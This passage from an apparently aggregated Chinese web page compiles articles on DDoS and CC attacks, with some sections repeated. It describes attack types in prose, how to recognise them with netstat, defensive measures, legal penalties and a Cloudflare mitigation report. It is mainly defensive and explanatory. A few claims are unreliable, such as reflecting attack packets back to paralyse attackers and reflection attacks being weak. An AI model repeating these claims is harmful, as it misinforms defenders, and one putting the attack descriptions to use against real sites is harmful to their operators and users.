–na,若观察到大量的SYN_RECEIVED的连接状态;C.网线插上后,服务器立即凝固无法操作,拔出后有时可以恢复,有时候需要重新启动机器才可恢复。 2.CC类攻击判断:A.网站出现service unavailable提示;B.CPU占用率很高;C.网络连接状态:netstat –na,若观察到大量的ESTABLISHED的连接状态 单个IP高达几十条甚至上百条;D.用户无法访问网站页面或打开过程非常缓慢,软重启后短期内恢复正常,几分钟后又无法访问。 3.UDP类攻击判断:A.观察网卡状况 每秒接受大量的数据包;B.网络状态:netstat –na TCP信息正常。 4.TCP洪水攻击判断:A.CPU占用很高;B.netstat –na,若观察到大量的ESTABLISHED的连接状态 单个IP高达几十条甚至上百条   DDoS攻击防御方法: 1. 过滤不必要的服务和端口:可以使用Inexpress、Express、Forwarding等工具来过滤不必要的服务和端口,即在路由器上过滤假IP。比如Cisco公司的CEF(Cisco Express Forwarding)可以针对封包Source IP和Routing Table做比较,并加以过滤。只开放服务端口成为目前很多服务器的流行做法,例如WWW服务器那么只开放80而将其他所有端口关闭或在防火墙上做阻止策略。 2. 异常流量的清洗过滤:通过DDOS硬件防火墙对异常流量的清洗过滤,通过数据包的规则过滤、数据流指纹检测过滤、及数据包内容定制过滤等顶尖技术能准确判断外来访问流量是否正常,进一步将异常流量禁止过滤。单台负载每秒可防御800-927万个syn攻击包。 3. 分布式集群防御:这是目前网络安全界防御大规模DDOS攻击的最有效办法。分布式集群防御的特点是在每个节点服务器配置多个IP地址(负载均衡),并且每个节点能承受不低于10G的DDOS攻击,如一个节点受攻击无法提供服务,系统将会根据优先级设置自动切换另一个节点,并将攻击者的数据包全部返回发送点,使攻击源成为瘫痪状态,从更为深度的安全防护角度去影响企业的安全执行决策,百度旗下的百度云加速CDN就是使用这种方式进行防御DDoS攻击。 4. 高防智能DNS解析:高智能DNS解析系统与DDOS防御系统的完美结合,为企业提供对抗新兴安全威胁的超级检测功能。它颠覆了传统一个域名对应一个镜像的做法,智能根据用户的上网路线将DNS解析请求解析到用户所属网络的服务器。同时智能DNS解析系统还有宕机检测功能,随时可将瘫痪的服务器IP智能更换成正常服务器IP,为企业的网络保持一个永不宕机的服务状态。 DDoS攻击的网络流量清洗 当发生DDOS攻击时,网络监控系统会侦测到网络流量的异常变化并发出报警。在系统自动检测或人工判断之后,可以识别出被攻击的虚拟机公网IP地址。这时,可调用系统的防DDOS攻击功能接口,启动对相关被攻击IP的流量清洗。流量清洗设备会立即接管对该IP地址的所有数据包,并将攻击数据包清洗掉,仅将正常的数据包转发给随后的网络设备。这样,就能保证整个网络正常的流量通行,而将DDOS流量拒之门外。 采用云DDoS清洗方式,可以为企业用户带来诸多好处。其表现在不仅可以提升综合防护能力,用户能够按需付费,可弹性扩展,而且还能够基于大数据来分析预测攻击,同时能够免费升级。对于企业用户来说,则可实现零运维、零改造。     CC攻击介绍 CC攻击(Challenge Collapsar)是DDOS(分布式拒绝服务)的一种,前身名为Fatboy攻击,也是一种常见的网站攻击方法。攻击者通过代理服务器或者肉鸡向向受害主机不停地发大量数据包,造成对方服务器资源耗尽,一直到宕机崩溃。相比其它的DDOS攻击CC似乎更有技术含量一些。这种攻击你见不到真实源IP,见不到特别大的异常流量,但造成服务器无法进行正常连接。最让站长们忧虑的是这种攻击技术含量低,利用更换IP代理工具和一些IP代理一个初、中级的电脑水平的用户就能够实施攻击。   CC攻击防御方法 1. 利用Session做访问计数器:利用Session针对每个IP做页面访问计数器或文件下载计数器,防止用户对某个页面频繁刷新导致数据库频繁读取或频繁下载某个文件而产生大额流量。(文件下载不要直接使用下载地址,才能在服务端代码中做CC攻击的过滤处理) 2. 把网站做成静态页面:大量事实证明,把网站尽可能做成静态页面,不仅能大大提高抗攻击能力,而且还给骇客入侵带来不少麻烦,至少到现在为止关于HTML的溢出还没出现,看看吧!新浪、搜狐、网易等门户网站主要都是静态页面,若你非需要动态脚本调用,那就把它弄到另外一台单独主机去,免的遭受攻击时连累主服务器。 3. 增强操作系统的TCP/IP栈 Win2000和Win2003作为服务器操作系统,本身就具备一定的抵抗DDOS攻击的能力,只是默认状态下没有开启而已,若开启的话可抵挡约10000个SYN攻击包,若没有开启则仅能抵御数百个,具体怎么开启,自己去看微软的文章吧!《强化 TCP/IP 堆栈安全》。也许有的人会问,那我用的是Linux和FreeBSD怎么办?很简单,按照这篇文章去做吧!《SYN Cookies》。 4. 在存在多站的服务器上,严格限制每一个站允许的IP连接数和CPU使用时间,这是一个很有效的方法。CC的防御要从代码做起,其实一个好的页面代码都应该注意这些东西,还有SQL注入,不光是一个入侵工具,更是一个DDOS缺口,大家都应该在代码中注意。举个例子吧,某服务器,开动了5000线的CC攻击,没有一点反应,因为它所有的访问数据库请求都必须一个随机参数在Session里面,全是静态页面,没有效果。突然发现它有一个请求会和外面的服务器联系获得,需要较长的时间,而且没有什么认证,开800线攻击,服务器马上满负荷了。代码层的防御需要从点点滴滴做起,一个脚本代码的错误,可能带来的是整个站的影响,甚至是整个服务器的影响! 5. 服务器前端加CDN中转 如果资金充裕的话,购买百度云加速、阿里云的SCDN、腾讯云SCDN等,用于隐藏服务器真实IP,域名解析使用CDN的IP,所有解析的子域名都使用CDN的IP地址。此外,服务器上部署的其他域名也不能使用真实IP解析,全部都使用CDN来解析。 另外,防止服务器对外传送信息泄漏IP地址,最常见的情况是,服务器不要使用发送邮件功能,因为邮件头会泄漏服务器的IP地址。如果非要发送邮件,可以通过第三方代理(例如sendcloud)发送,这样对外显示的IP是代理的IP地址。 总之,只要服务器的真实IP不泄露,一般的攻击并不会对服务器造成太大的影响,顶多是打开卡满,这些百度云加速都有对应的防御能力。   WAF介绍 WAF(Web Application Firewall)的中文名称叫做“Web应用防火墙”,利用国际上公认的一种说法,WAF的定义是这样的:Web应用防火墙是通过执行一系列针对HTTP/HTTPS的安全策略来专门为Web应用提供保护的一款产品。通过从上面对WAF的定义中,我们可以很清晰的了解到,WAF是一种工作在应用层的、通过特定的安全策略来专门为Web应用提供安全防护的产品。 根据不同的分类方法,WAF可分为许多种。从产品形态上来划分,WAF主要分为以下三大类: 1.硬件设备类:目前安全市场上,大多数的WAF都属于此类。它们以一个独立的硬件设备的形态存在,支持以多种方式(如透明桥接模式、旁路模式、反向代理等)部署到网络中为后端的Web应用提供安全防护。相对于软件产品类的WAF,这类产品的优点是性能好、功能全面、支持多种模式部署等,但它的价格通常比较贵。国内的绿盟、安恒、启明星辰等厂商生产的WAF都属于此类。 2.软件产品类:这种类型的WAF采用纯软件的方式实现,特点是安装简单,容易使用,成本低。但它的缺点也是显而易见的,因为它必须安装在Web应用服务器上,除了性能受到限制外,还可能会存在兼容性、安全等问题。这类WAF的代表有ModSecurity、Naxsi、网站安全狗等。 3.基于云的WAF:随着云计算技术的快速发展,使得其于云的WAF实现成为可能。国内百度云加速就是这类WAF的典型代表。它的优点是快速部署、零维护、成本低。对于中、小型的企业和个人站长是很有吸引力的。 #### DDoS攻击与CC攻击的区别(DDoS攻击CC攻击详细介绍) DDoS攻击与CC攻击的区别 DDoS攻击和CC攻击都是网络攻击的形式,用来干扰或完全破坏正常的网络服务。不过,它们在目标、策略和危害性方面存在一些区别。 DDoS攻击 DDoS(Distributed Denial of Service)攻击是一种分布式拒绝服务攻击,主要通过利用多台受损计算机系统(也称为肉鸡或傀儡机)发起协同的大规模攻击。攻击者将大量无用数据发往目标服务器,制造网络拥塞,耗尽服务器的服务资源,导致正常用户无法访问。这种攻击不仅可以针对个人的计算机,也可以针对网络中的路由器或其他基础设施设备。 CC攻击 CC攻击,全称Challenge Collapsar,是DDoS的一种特殊形态,聚焦于应用层。相比DDoS攻击,CC攻击在某些方面显示出较高的技术含量。它通常模拟正常用户行为,不断地向目标网站的某些资源消耗性较高的网页发送请求,目的是使服务器处理这些请求时耗费大量的资源,导致合法用户请求得不到处理。CC攻击可能不会产生巨大的流量异常,但会直接影响服务器的服务能力,使其无法正常提供服务。 关键区别 攻击范围:DDoS侧重于IP层面的攻击,而CC攻击则是面向网页或应用层的攻击。 危害性:DDoS攻击通常更难以防御,危害性更大。CC攻击虽然对服务器造成的直接破坏可能不如DDoS攻击,但它的隐蔽性强,很难辨别。 技术含量:CC攻击往往更加精准,攻击方式更为隐秘,模拟的是正常用户的请求行为,这使得CC攻击相对于DDoS来说更具技术含量。 防护措施 对于CC攻击,可以通过一系列措施进行防护,例如:增加带宽、使用CDN服务分散流量、设置基于IP地址和请求频率的拦截策略以及使用防火墙进行过滤和检测。此外,还可以限制单个IP地址或用户的连接次数,减小服务器的负担。 而对于DDoS攻击,我们需要用到专业的清洗设备,因此DDoS防御需要购买高防服务器、高防IP、高防CDN这类专业DDOS防御服务。 综上所述,虽然DDoS攻击和CC攻击在执行的手段和目标上有所区别,但二者都旨在通过占用大量服务器资源使正常服务无法进行,对网站运营和用户体验产生严重影响。因此,选择有效的防御手段对抵御这些攻击至关重要。 #### DDOS攻击与RDoS有什么区别? DDoS攻击和RDoS攻击都是网络攻击中常见的类型,它们都利用了分布式计算的特点,通过向目标服务器发送大量的请求或数据包来使其无法正常工作。虽然这两种攻击方式有些相似之处,但它们之间还是存在一些区别的。 首先,DDoS攻击(分布式拒绝服务攻击)是指攻击者通过控制大量的计算机系统同时向目标服务器发送请求,从而使服务器无法正常提供服务。这种攻击方式通常会持续一段时间,直到服务器超负荷而崩溃。DDoS攻击可以分为多种类型,包括SYN Flood、UDP Flood、ICMP Flood等。 而RDoS攻击(反射拒绝服务攻击)则是指攻击者通过反射的方式向目标服务器发送大量的请求或数据包,从而使服务器无法正常处理这些请求。与DDoS攻击不同的是,RDoS攻击通常只使用少量的攻击节点,因此攻击效果相对较弱。但是,由于反射请求具有高度的可扩展性和隐蔽性,因此它仍然是一种非常危险的攻击方式。 其次,DDoS攻击和RDoS攻击的目标对象也有所不同。DDoS攻击通常针对的是互联网上的网站、应用程序或云服务等公共资源,目的是让这些资源无法正常提供服务。而RDoS攻击则通常针对的是特定的目标服务器,例如某些游戏服务器、数据库服务器等,目的是让这些服务器无法正常处理来自其他用户的请求。 最后,DDoS攻击和RDoS攻击的防御方法也有所不同。对于DDoS攻击,常用的防御方法包括防火墙、入侵检测系统、负载均衡器等。这些工具可以帮助监测和过滤掉恶意流量,从而保护目标服务器免受攻击。而对于RDoS攻击,由于其攻击节点较少且难以被发现,因此防御起来相对困难。目前,一些专门的防御设备和技术正在不断发展,以应对日益复杂的RDoS攻击威胁。 #### DDOS攻击创新高!Cloudflare 成功应对史上最大 HTTPS DDoS 攻击:每秒 2600 万次请求  6 月 15 日消息,Cloudflare 透露,它检测到并缓解了有史以来最大的 HTTPS DDoS 攻击,该攻击每秒发出 2600 万次请求。目标是 Cloudflare 的免费计划客户之一。此前 Cloudflare 已成功应对有史以来最大 HTTPS DDoS 攻击之一,达每秒 1530 万次请求。 与 4 月份的攻击类似,这次攻击主要来自云服务提供商,而不是住宅互联网服务提供商。这意味着虚拟机和服务器被劫持来执行攻击,而不是使用物联网 (IoT) 设备。执行此攻击的僵尸网络由 5067 台设备组成,每个节点在攻击高峰时每秒发出 5200 个请求。 Cloudflare 指出,这次攻击是通过 HTTPS 完成的,HTTPS 的使用让攻击者和试图减轻攻击的受害者的成本变得更高。僵尸网络攻击来自 121 个国家和地区,其中来自印度尼西亚、美国、巴西和俄罗斯地区的攻击请求最多。3% 的攻击是通过 Tor 连接进行的。 Cloudflare 表示,其免费和专业计划的所有客户都受到此类攻击的保护。其保护是不受限制的,因此无论攻击的规模或持续时间如何,客户都不会为此服务支付更多费用。 #### DDoS攻击判断与防御方法 一、DDoS介绍 DDoS是英文Distributed Denial of Service的缩写,意即“分布式拒绝服务”,那么什么又是拒绝服务(Denial of Service)呢?可以这么理解,凡是能导致合法用户不能够访问正常网络服务的行为都算是拒绝服务攻击。也就是说拒绝服务攻击的目的非常明确,就是要阻止合法用户对正常网络资源的访问,从而达成攻击者不可告人的目的。分布式拒绝服务攻击一旦被实施,攻击网络包就会从很多DOS攻击源(俗称肉鸡)犹如洪水般涌向受害主机,从而把合法用户的网络包淹没,导致合法用户无法正常访问服务器的网络资源,因此,拒绝服务攻击又被称之为“洪水式攻击”,常见的DDOS攻击手段有SYN Flood、ACK Flood、UDP Flood、ICMP Flood、TCP Flood、Connections Flood、Script Flood、Proxy Flood等。 目前而言,黑客甚至对攻击进行明码标价,打1G的流量到一个网站一小时,只需50块钱。DDoS的成本如此之低,而且攻击了也没人管。   关于DDos攻击的常见方法 1. SYN Flood:利用TCP协议的原理,这种攻击方法是经典最有效的DDOS方法,可通杀各种系统的网络服务,主要是通过向受害主机发送大量伪造源IP和源端口的SYN或ACK 包,导致主机的缓存资源被耗尽或忙于发送回应包而造成拒绝服务。TCP通道在建立以前,需要三次握手: a. 客户端发送一个包含SYN标志的TCP报文, 同步报文指明客户端所需要的端口号和TCP连接的初始序列号b. 服务器收到SYN报文之后,返回一个SYN+ ACK报文,表示客户端请求被接受,TCP初始序列号加1c.客户端也返回一个确认报文ACK给服务器,同样TCP序列号加1d. 如果服务器端没有收到客户端的确认报文ACK,则处于等待状态,将该客户IP加入等待队列,然后轮训发送SYN+ACK报文所以攻击者可以通过伪造大量的TCP握手请求,耗尽服务器端的资源。 2. HTTP Flood:针对系统的每个Web页面,或者资源,或者Rest API,用大量肉鸡,发送大量http request。这种攻击主要是针对存在ASP、JSP、PHP、CGI等脚本程序,并调用MSSQLServer、MySQLServer、Oracle等数据库的网站系统而设计的,特征是和服务器建立正常的TCP连接,并不断的向脚本程序提交查询、列表等大量耗费数据库资源的调用,典型的以小博大的攻击方法。缺点是对付只有静态页面的网站效果会大打折扣。 3. 慢速攻击:Http协议中规定,HttpRequest以\r\n\r\n结尾来表示客户端发送结束。攻击者打开一个Http 1.1的连接,将Connection设置为Keep-Alive, 保持和服务器的TCP长连接。然后始终不发送\r\n\r\n, 每隔几分钟写入一些无意义的数据流, 拖死机器。 4. P2P攻击:每当网络上出现一个热门事件,比如XX门, 精心制作一个种子, 里面包含正确的文件下载, 同时也包括攻击目标服务器的IP。这样,当很多人下载的时候, 会无意中发起对目标服务器的TCP连接。 DDOS攻击现象判定方法 1.SYN类攻击判断:A.CPU占用很高;B.网络连接状态:netstat –na,若观察到大量的SYN_RECEIVED的连接状态;C.网线插上后,服务器立即凝固无法操作,拔出后有时可以恢复,有时候需要重新启动机器才可恢复。 2.CC类攻击判断:A.网站出现service unavailable提示;B.CPU占用率很高;C.网络连接状态:netstat –na,若观察到大量的ESTABLISHED的连接状态 单个IP高达几十条甚至上百条;D.用户无法访问网站页面或打开过程非常缓慢,软重启后短期内恢复正常,几分钟后又无法访问。 3.UDP类攻击判断:A.观察网卡状况 每秒接受大量的数据包;B.网络状态:netstat –na TCP信息正常。 4.TCP洪水攻击判断:A.CPU占用很高;B.netstat –na,若观察到大量的ESTABLISHED的连接状态 单个IP高达几十条甚至上百条   DDoS攻击防御方法 1. 过滤不必要的服务和端口:可以使用Inexpress、Express、Forwarding等工具来过滤不必要的服务和端口,即在路由器上过滤假IP。比如Cisco公司的CEF(Cisco Express Forwarding)可以针对封包Source IP和Routing Table做比较,并加以过滤。只开放服务端口成为目前很多服务器的流行做法,例如WWW服务器那么只开放80而将其他所有端口关闭或在防火墙上做阻止策略。 2. 异常流量的清洗过滤:通过DDOS硬件防火墙对异常流量的清洗过滤,通过数据包的规则过滤、数据流指纹检测过滤、及数据包内容定制过滤等顶尖技术能准确判断外来访问流量是否正常,进一步将异常流量禁止过滤。单台负载每秒可防御800-927万个syn攻击包。 3. 分布式集群防御:这是目前网络安全界防御大规模DDOS攻击的最有效办法。分布式集群防御的特点是在每个节点服务器配置多个IP地址(负载均衡),并且每个节点能承受不低于10G的DDOS攻击,如一个节点受攻击无法提供服务,系统将会根据优先级设置自动切换另一个节点,并将攻击者的数据包全部返回发送点,使攻击源成为瘫痪状态,从更为深度的安全防护角度去影响企业的安全执行决策,目前百度云加速就使用这种方式,提供四到七层的DDoS攻击防护,包括CC、SYN flood、UDP flood等所有DDoS攻击方式, 通过分布式高性能防火墙+精准流量清洗+CC防御+WEB攻击拦截,组合过滤精确识别,有效防御各种类型攻击。相关链接 4. 高防智能DNS解析:高智能DNS解析系统与DDOS防御系统的完美结合,为企业提供对抗新兴安全威胁的超级检测功能。它颠覆了传统一个域名对应一个镜像的做法,智能根据用户的上网路线将DNS解析请求解析到用户所属网络的服务器。同时智能DNS解析系统还有宕机检测功能,随时可将瘫痪的服务器IP智能更换成正常服务器IP,为企业的网络保持一个永不宕机的服务状态。 DDoS攻击的网络流量清洗 当发生DDOS攻击时,网络监控系统会侦测到网络流量的异常变化并发出报警。在系统自动检测或人工判断之后,可以识别出被攻击的虚拟机公网IP地址。这时,可调用系统的防DDOS攻击功能接口,启动对相关被攻击IP的流量清洗。流量清洗设备会立即接管对该IP地址的所有数据包,并将攻击数据包清洗掉,仅将正常的数据包转发给随后的网络设备。这样,就能保证整个网络正常的流量通行,而将DDOS流量拒之门外。采用云DDoS清洗方式,可以为企业用户带来诸多好处。其表现在不仅可以提升综合防护能力,用户能够按需付费,可弹性扩展,而且还能够基于大数据来分析预测攻击,同时能够免费升级。对于企业用户来说,则可实现零运维、零改造。   #### DDOS攻击别人网站服务器违法的吗?ddos攻击判刑多久? DDOS攻击国内是违法的,ddos攻击判刑,处五年以下有期徒刑或者拘役,后果特别严重的,处五年以上有期徒刑。分布式拒绝服务攻击可以使很多的计算机在同一时间遭受到攻击,使攻击的目标无法正常使用,分布式拒绝服务攻击已经出现了很多次,导致很多的大型网站都出现了无法进行操作的情况,这样不仅仅会影响用户的正常使用,同时造成的经济损失也是非常巨大的。分布式拒绝服务攻击方式在进行攻击的时候,可以对源IP地址进行伪造,这样就使得这种攻击在发生的时候隐蔽性是非常好的,同时要对攻击进行检测也是非常困难的,因此这种攻击方式也成为了非常难以防范的攻击。分布式拒绝服务攻击可分为以下几类:1、基于自动化程度分类;2、基于系统及协议的弱点分类;3、基于攻击速率分类;4、基于影响力进行分类;5、基于入侵目标分类;6、基于攻击路线分类;7、基于攻击特征分类。当被DDoS攻击时,主要表现为:1、被攻击主机上有大量等待的TCP连接;2、网络中充斥着大量的无用的数据包,源地址为假;3、制造高流量无用数据,造成网络拥塞,使受害主机无法正常和外界通讯;4、利用受害主机提供的服务或传输协议上的缺陷,反复高速地发出特定的服务请求,使受害主机无法及时处理所有正常请求;5、严重时会造成系统死机。《中华人民共和国刑法》第二百八十六条 破坏计算机信息系统罪违反国家规定,对计算机信息系统功能进行删除、修改、增加、干扰,造成计算机信息系统不能正常运行,后果严重的,处五年以下有期徒刑或者拘役;后果特别严重的,处五年以上有期徒刑。违反国家规定,对计算机信息系统中存储、处理或者传输的数据和应用程序进行删除、修改、增加的操作,后果严重的,依照前款的规定处罚。 #### DDoS攻击原理是什么?DDoS攻击原理及防护措施介绍 DDoS攻击是由DoS攻击转化的,这项攻击的原理以及表现形式是怎样的呢?要如何的进行防御呢?本文中将会有详细的介绍,需要的朋友不妨阅读本文进行参考. DDoS攻击原理是什么?随着网络时代的到来,网络安全变得越来越重要。在互联网的安全领域,DDoS(Distributed DenialofService)攻击技术因为它的隐蔽性,高效性一直是网络攻击者最青睐的攻击方式,它严重威胁着互联网的安全。接下来的文章中小编将会介绍DDoS攻击原理、表现形式以及防御策略。希望对您有所帮助。 DDoS攻击原理及防护措施介绍 一、DDoS攻击的工作原理 1.1 DDoS的定义 DDos的前身 DoS (DenialofService)攻击,其含义是拒绝服务攻击,这种攻击行为使网站服务器充斥大量的要求回复的信息,消耗网络带宽或系统资源,导致网络或系统不胜负荷而停止提供正常的网络服务。而DDoS分布式拒绝服务,则主要利用 Internet上现有机器及系统的漏洞,攻占大量联网主机,使其成为攻击者的代理。当被控制的机器达到一定数量后,攻击者通过发送指令操纵这些攻击机同时向目标主机或网络发起DoS攻击,大量消耗其网络带和系统资源,导致该网络或系统瘫痪或停止提供正常的网络服务。由于DDos的分布式特征,它具有了比Dos远为强大的攻击力和破坏性。 1.2 DDoS的攻击原理 如图1所示,一个比较完善的DDos攻击体系分成四大部分,分别是攻击者( attacker也可以称为master)、控制傀儡机( handler)、攻击傀儡机( demon,又可称agent)和受害着( victim)。第2和第3部分,分别用做控制和实际发起攻击。第2部分的控制机只发布令而不参与实际的攻击,第3部分攻击傀儡机上发出DDoS的实际攻击包。对第2和第3部分计算机,攻击者有控制权或者是部分的控制权,并把相应的DDoS程序上传到这些平台上,这些程序与正常的程序一样运行并等待来自攻击者的指令,通常它还会利用各种手段隐藏自己不被别人发现。在平时,这些傀儡机器并没有什么异常,只是一旦攻击者连接到它们进行控制,并发出指令的时候,攻击愧儡机就成为攻击者去发起攻击了。 图1分布式拒绝服务攻击体系结构 之所以采用这样的结构,一个重要目的是隔离网络联系,保护攻击者,使其不会在攻击进行时受到监控系统的跟踪。同时也能够更好地协调进攻,因为攻击执行器的数目太多,同时由一个系统来发布命令会造成控制系统的网络阻塞,影响攻击的突然性和协同性。而且,流量的突然增大也容易暴露攻击者的位置和意图。整个过程可分为: 1)扫描大量主机以寻找可入侵主机目标; 2)有安全漏洞的主机并获取控制权; 3)入侵主机中安装攻击程序; 4)用己入侵主机继续进行扫描和入侵。 当受控制的攻击代理机达到攻击者满意的数量时,攻击者就可以通过攻击主控机随时发出击指令。由于攻击主控机的位置非常灵活,而且发布命令的时间很短,所以非常隐蔽以定位。一旦攻击的命令传送到攻击操纵机,主控机就可以关闭或脱离网络,以逃避追踪要着,攻击操纵机将命令发布到各个攻击代理机。在攻击代理机接到攻击命令后,就开始向目标主机发出大量的服务请求数据包。这些数据包经过伪装,使被攻击者无法识别它的来源面且,这些包所请求的服务往往要消耗较大的系统资源,如CP或网络带宽。如果数百台甚至上千台攻击代理机同时攻击一个目标,就会导致目标主机网络和系统资源的耗尽,从而停止服务。有时,甚至会导致系统崩溃。 另外,这样还可以阻塞目标网络的防火墙和路由器等网络设备,进一步加重网络拥塞状况。于是,目标主机根本无法为用户提供任何服务。攻击者所用的协议都是一些非常常见的协议和服务。这样,系统管理员就难于区分恶意请求和正连接请求,从而无法有效分离出攻击数据包 二、DDoS攻击识别 DDoS ( Denial of Service,分布式拒绝服务) 攻击的主要目的是让指定目标无注提供正常服务,甚至从互联网上消失,是目前最强大、最难防御的攻击方式之一。 2.1 DDoS表现形式 DDoS的表现形式主要有两种,一种为流量攻击,主要是针对网络带宽的攻击,即大量攻击包导致网络带宽被阻塞,合法网络包被虚假的攻击包淹没而无法到达主机;另一种为资源耗尽攻击,主要是针对服务器主机的政击,即通过大量攻击包导致主机的内存被耗尽或CPU内核及应用程序占完而造成无法提供网络服务。 2.2 攻击识别 流量攻击识别主要有以下2种方法: 1) Ping测试:若发现Ping超时或丢包严重,则可能遭受攻击,若发现相同交换机上的服务器也无法访问,基本可以确定为流量攻击。测试前提是受害主机到服务器间的ICMP协议没有被路由器和防火墙等设备屏蔽; 2) Telnet测试:其显著特征是远程终端连接服务器失败,相对流量攻击,资源耗尽攻击易判断,若网站访问突然非常缓慢或无法访问,但可Ping通,则很可能遭受攻击,若在服务器上用Netstat-na命令观察到大量 SYN_RECEIVED、 TIME_WAIT, FIN_ WAIT_1等状态,而EASTBLISHED很少,可判定为资源耗尽攻击,特征是受害主机Ping不通或丢包严重而Ping相同交换机上的服务器正常,则原因是攻击导致系统内核或应用程序CPU利用率达100%无法回应Ping命令,但因仍有带宽,可ping通相同交换机上主机。 三、DDoS攻击方式 DDoS攻击方式及其变种繁多,就其攻击方式面言,有三种最为流行的DDoS攻击方式。 3.1 SYN/ACK Flood攻击 这种攻击方法是经典有效的DDoS攻击方法,可通杀各种系统的网络服务,主要是通过向受害主机发送大量伪造源P和源端口的SYN或ACK包,导致主机的缓存资源被耗尽或忙于发送回应包而造成拒绝服务,由于源都是伤造的故追踪起来比较困难,缺点是实施起来有一定难度,需要高带宽的僵尸主机支持,少量的这种攻击会导致主机服务器无法访问,但却可以Ping的通,在服务器上用 Netstat-na命令会观察到存在大量的 SYN RECEIVED状态,大量的这种攻击会导致Ping失败,TCP/IP栈失效,并会出现系统凝固现象,即不响应键盘和鼠标。普通防火墙大多无法抵御此种攻击。 攻击流程如图2所示,正常TCP连接为3次握手,系统B向系统A发送完 SYN/ACK分组后,停在 SYN RECV状态,等待系统A返回ACK分组;此时系统B已经为准备建立该连接分配了资源,若攻击者系统A,使用伪造源IP,系统B始终处于“半连接”等待状态,直至超时将该连接从连接队列中清除;因定时器设置及连接队列满等原因,系统A在很短时间内,只要持续高速发送伪造源IP的连接请求至系统B,便可成功攻击系统B,而系统B己不能相应其他正常连接请求。 图2 SYN Flooding攻击流程 3.2 TCP全连接攻击 这种攻击是为了绕过常规防火墙的检查而设计的,一般情况下,常规防火墙大多具备过滤 TearDrop、Land等DOS攻击的能力,但对于正常的TCP连接是放过的,殊不知很多网络服务程序(如:IIS、 Apache等Web服务器)能接受的TCP连接数是有限的,一旦有大量的TCP连接,即便是正常的,也会导致网站访问非常缓慢甚至无法访问,TCP全连接攻击就是通过许多僵尸主机不断地与受害服务器建立大量的TCP连接,直到服务器的内存等资源被耗尽面被拖跨,从而造成拒绝服务,这种攻击的特点是可绕过一般防火墙的防护而达到攻击目的,缺点是需要找很多僵尸主机,并且由于僵尸主机的IP是暴露的,因此此种DDOs攻击方容易被追踪。 3.3 TCP刷 Script脚本攻击 这种攻击主要是针对存在ASP、JSP、PHP、CGI等脚本程序,并调用 MSSQL Server、My SQL Server、 Oracle等数据库的网站系统而设计的,特征是和服务器建立正常的TCP连接,不断的向脚本程序提交查询、列表等大量耗费数据库资源的调用,典型的以小博大的攻击方法。一般来说,提交一个GET或POST指令对客户端的耗费和带宽的占用是几乎可以忽略的,而服务器为处理此请求却可能要从上万条记录中去查出某个记录,这种处理过程对资源的耗费是很大的,常见的数据库服务器很少能支持数百个查询指令同时执行,而这对于客户端来说却是轻而易举的,因此攻击者只需通过 Proxy代理向主机服务器大量递交查询指令,只需数分钟就会把服务器资源消耗掉而导致拒绝服务,常见的现象就是网站慢如蜗牛、ASP程序失效、PHP连接数据库失败、数据库主程序占用CPU偏高。这种攻击的特点是可以完全绕过普通的防火墙防护,轻松找一些Poxy代理就可实施攻击,缺点是对付只有静态页面的网站效果会大打折扣,并且有些代理会暴露DDOS攻击者的IP地址。 四、DDoS的防护策略 DDoS的防护是个系统工程,想仅仅依靠某种系统或产品防住DDoS是不现实的,可以肯定的说,完全杜绝DDoS目前是不可能的,但通过适当的措施抵御大多数的DDoS攻击是可以做到的,基于攻击和防御都有成本开销的缘故,若通过适当的办法增强了抵御DDoS的能力,也就意味着加大了攻击者的攻击成本,那么绝大多数攻击者将无法继续下去而放弃,也就相当于成功的抵御了DDoS攻击。 4.1 采用高性能的网络设备 抗DDoS攻击首先要保证网络设备不能成为瓶颈,因此选择路由器、交换机、硬件防火墙等设备的时候要尽量选用知名度高、口碑好的产品。再就是假如和网络提供商有特殊关系或协议的话就更好了,当大量攻击发生的时候请他们在网络接点处做一下流量限制来对抗某些种类的DDoS攻击是非常有效的。 4.2 尽量避免NAT的使用 无论是路由器还是硬件防护墙设备都要尽量避免采用网络地址转换NAT的使用,除了必须使用NAT,因为采用此技术会较大降低网络通信能力,原因很简单,因为NAT需要对地址来回转换,转换过程中需要对网络包的校验和进行计算,因此浪费了很多CPU的时间。 4.3 充足的网络带宽保证 网络带宽直接决定了能抗受攻击的能力,假若仅有10M带宽,无论采取何种措施都很难对抗现在的 SYNFlood攻击,当前至少要选择100M的共享带宽,1000M的带宽会更好,但需要注意的是,主机上的网卡是1000M的并不意味着它的网络带宽就是千兆的,若把它接在100M的交换机上,它的实际带宽不会超过100M,再就是接在100M的带宽上也不等于就有了百兆的带宽,因为网络服务商很可能会在交换机上限制实际带宽为10M。 4.4 升级主机服务器硬件 在有网络带宽保证的前提下,尽量提升硬件配置,要有效对抗每秒10万个SYN攻击包,服务器的配置至少应该为:P4 2.4G/DDR512M/SCSI-HD,起关键作用的主要是CPU和内存,内存一定要选择DDR的高速内存,硬盘要尽量选择SCSI的,要保障硬件性能高并且稳定,否则会付出高昂的性能代价。 4.5 把网站做成静态页面 大量事实证明,把网站尽可能做成静态页面,不仅能大大提高抗攻击能力,而且还给黑客入侵带来不少麻烦,到现在为止还没有出现关于HTML的溢出的情况,新浪、搜狐、网易等门户网站主要都是静态页面。 此外,最好在需要调用数据库的脚本中拒绝使用代理的访问,因为经验表明使用代理访问我们网站的80%属于恶意行为。 五、总结 DDoS攻击正在不断演化,变得日益强大、隐密,更具针对性且更复杂,它已成为互联网安全的重大威胁,同时随着系统的更新换代,新的系统漏洞不断地出现,DDoS的攻击技巧的提高,也给DDoS防护增加了难度,有效地对付这种攻击是一个系统工程,不仅需要技术人员去探索防护的手段,网络的使用者也要具备网络攻击基本的防护意识和手段,只有将技术手段和人员素质结合到一起才能最大限度的发挥网络防护的效能。 以上就是小编为大家带来的DDoS攻击原理是什么?DDoS攻击原理及防护措施介绍,希望能对您有所帮助,小伙伴们有空可以来主机吧网站,我们的网站上还有许多其它的资料等着小伙伴来挖掘哦! #### DDOS攻击如何攻击网站? 